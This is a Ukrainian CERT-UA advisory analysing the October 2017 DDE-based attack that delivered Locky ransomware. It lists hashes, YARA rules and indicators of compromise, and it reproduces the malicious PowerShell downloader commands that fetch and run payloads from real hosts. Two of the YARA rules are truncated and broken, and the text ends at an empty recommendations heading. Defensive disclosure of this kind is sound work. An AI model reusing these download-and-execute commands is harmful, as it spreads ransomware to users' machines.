В атаці 24.10.2017 на деякі об’єкти інфраструктури України використовувалася техніка DDE, яка активовувала виконання шкідливого коду на комп’ютері користувача.
Команді CERT-UA було надіслано для аналізу файл:
Invoice_file_916096.doc
36170f61b5c6e2c311a379704329237d
https://www.virustotal.com/#/file/99b695b3d2ce9b0440ce7526fea59f7a4851d83d9a9d9a6cf906417068bc7524/community
Файл для подальшої експлуатації використовув DDE-вразливість (CVE-2017-11826)
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11826
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11826
Виявити DDE-атаку можливо за допомогою наступної YARA-сигнатури:
YARA rules Office DDE
https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
rule Office_DDEAUTO_field {
strings:
$a = /
condition:
$a
}
rule Office_DDE_field {
strings:
$a = /
condition:
$a
}
rule Office_OLE_DDEAUTO {
strings:
$a = /\x13\s*DDEAUTO\b[^\x14]+/ nocase
condition:
uint32be(0) == 0xD0CF11E0 and $a
}
rule Office_OLE_DDE {
strings:
$a = /\x13\s*DDE\b[^\x14]+/ nocase
condition:
uint32be(0) == 0xD0CF11E0 and $a
}
В результаті активації користувачем ole-гіперпосилання активовувався powershell-скрипт:
cmd.exe /k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create(‘http://urcho.com/JHGGsdsw6’)).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr (PID: 2872, Additional Context: new-object ((([Net.WebRequest]::Create(‘hxxp://urcho.com/JHGGsdsw6’)).GetResponse()).GetResponseStream()).ReadToEnd();;)
Даний скрипт підвантажував на систему користовувача закодовані base64-алгоритмом дані, а саме:
DQAKACQAdQByAGwAcwAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AdABhAHQAaQBhAG4AYQBkAGUAY…
Результат декодування даних:
$urls = «http://tatianadecastelbajac.fr/kjhgFG»,»http://video.rb-webdev.de/kjhgFG»,»http://themclarenfamily.com/kjhgFG»
foreach($url in $urls){
Try
{
Write-Host $url
$fp = «$env:temp\heropad64.exe»
Write-Host $fp
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $fp)
Start-Process $fp
break
}
Catch
{
Write-Host $_.Exception.Message
}
}
Скрипт підвантажував на систему з одного з доступних на момент активації url адрес завантажувача з назвою heropad64.exe
(https://www.virustotal.com/ru/file/3d750de58563f860cd8f8674ce08e96b1f4e3ae3564c10efe61c50738056b0f2/analysis/), який в подальшому підвантажував на комп’ютер користувача шифрувальника файлів Locky.
Файл heropad64.exe підвантажував шифрувальника файлів Locky з наступного url:
hxxp://webhotell.enivest.no/cuYT39.enc
Дані пізніше розшифровувалися та збиралися в MZ/PE файл (https://www.virustotal.com/en/file/0f5be64bc9be27c4a9cab972f5a5879337cb8cfd155a84e62399ed34e8d5a1dc/analysis/1508841472/)
Командно-контрольний центр шифрувальника:
hxxp://gdiscoun.org
Індикатори компрометації:
hxxp://urcho.com/JHGGsdsw6
hxxp://tatianadecastelbajac.fr/kjhgFG
hxxp://video.rb-webdev.de/kjhgFG
hxxp://themclarenfamily.com/kjhgFG
hxxp://webhotell.enivest.no/cuYT39.enc
hxxp://gdiscoun.org
Рекомендації CERT—UA: